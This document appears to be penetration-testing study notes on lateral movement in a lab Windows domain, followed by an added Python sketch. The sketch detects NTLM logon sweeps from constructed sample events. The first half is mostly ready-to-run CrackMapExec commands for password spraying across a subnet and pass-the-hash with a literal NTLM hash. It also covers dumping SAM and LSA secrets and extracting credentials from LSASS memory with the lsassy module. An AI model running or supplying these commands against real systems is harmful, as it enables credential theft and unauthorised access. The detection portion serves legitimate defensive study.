What is this?

If we crack a password and/or can dump the SAM hashes, we can leverage both for lateral movement in the network.

crackmapexec smb 10.10.10.0/24 -u fcastle -d MARVEL.local -p Password1

Pass the Hash attack

crackmapexec smb 10.10.10.0/24 -u administrator -H <NTLM_HASH> --local-auth

Dump the SAM directly

crackmapexec smb 10.10.10.0/24 -u administrator -H <NTLM_HASH> --local-auth --sam

Enumerate shares

crackmapexec smb 10.10.10.0/24 -u administrator -H <NTLM_HASH> --local-auth --shares

Dump Local Security Authority (LSA) secrets

crackmapexec smb 10.10.10.0/24 -u administrator -H <NTLM_HASH> --local-auth --lsa

Dumps any secrets stored in memory. -M selects the module to run; the available modules can be listed with -L.

crackmapexec smb 10.10.10.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:fbdcd5041c96ddbd82224270b57f11fc --local-auth -M lsassy

CrackMapExec database

cmedb
help
creds
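
Added example (not part of the original notes): when one credential is tried across a /24 as in the commands above, each target records a Security event 4624 network logon (LogonType 3) over NTLM from the same source address. The sketch below flags that pattern from the defender's side; the event records, host names, source IPs and thresholds are constructed assumptions, and only the 4624 field names are real.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(ts, computer, user, domain, ip, pkg="NTLM", logon_type=3):
    """Build one constructed record using Windows Security event 4624 field names."""
    return {"EventID": 4624, "TimeCreated": datetime.fromisoformat(ts), "Computer": computer,
            "TargetUserName": user, "TargetDomainName": domain, "IpAddress": ip,
            "AuthenticationPackageName": pkg, "LogonType": logon_type}

# Constructed sample data (not from a real environment).
SAMPLE_EVENTS = [
    ev("2024-01-01T10:00:01", "WS01.MARVEL.local", "administrator", "WS01", "10.10.10.50"),
    ev("2024-01-01T10:00:02", "WS02.MARVEL.local", "administrator", "WS02", "10.10.10.50"),
    ev("2024-01-01T10:00:03", "WS03.MARVEL.local", "Administrator", "WS03", "10.10.10.50"),
    ev("2024-01-01T10:00:04", "FS01.MARVEL.local", "fcastle", "MARVEL", "10.10.10.21", pkg="Kerberos"),
    ev("2024-01-01T10:30:00", "FS01.MARVEL.local", "fcastle", "MARVEL", "10.10.10.21"),
    ev("2024-01-01T11:45:00", "WS01.MARVEL.local", "fcastle", "MARVEL", "10.10.10.21"),
    ev("2024-01-01T13:00:00", "WS02.MARVEL.local", "fcastle", "MARVEL", "10.10.10.21"),
]

def is_local_account(e):
    """Heuristic (assumption): a local account logs on with the target's own host name as domain."""
    return e["TargetDomainName"].lower() == e["Computer"].split(".")[0].lower()

def find_ntlm_sweeps(events, min_hosts=3, window=timedelta(minutes=5)):
    """Return (source IP, account) pairs with NTLM network logons to >= min_hosts hosts in window."""
    groups = defaultdict(list)
    for e in events:
        if (e["EventID"], e["LogonType"]) == (4624, 3) and e["AuthenticationPackageName"].upper() == "NTLM":
            groups[(e["IpAddress"], e["TargetUserName"].lower())].append(e)
    findings = []
    for (src, user), evs in sorted(groups.items()):
        evs.sort(key=lambda e: e["TimeCreated"])
        start, best = 0, set()
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[end]["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1
            hosts = {e["Computer"] for e in evs[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            local = all(is_local_account(e) for e in evs if e["Computer"] in best)
            findings.append({"source": src, "user": user, "hosts": sorted(best),
                             "local_account": local})
    return findings

if __name__ == "__main__":
    print(find_ntlm_sweeps(SAMPLE_EVENTS))
```

With the default five-minute window only the administrator sweep is reported; the fcastle NTLM logons are spread over hours and the Kerberos logon is ignored.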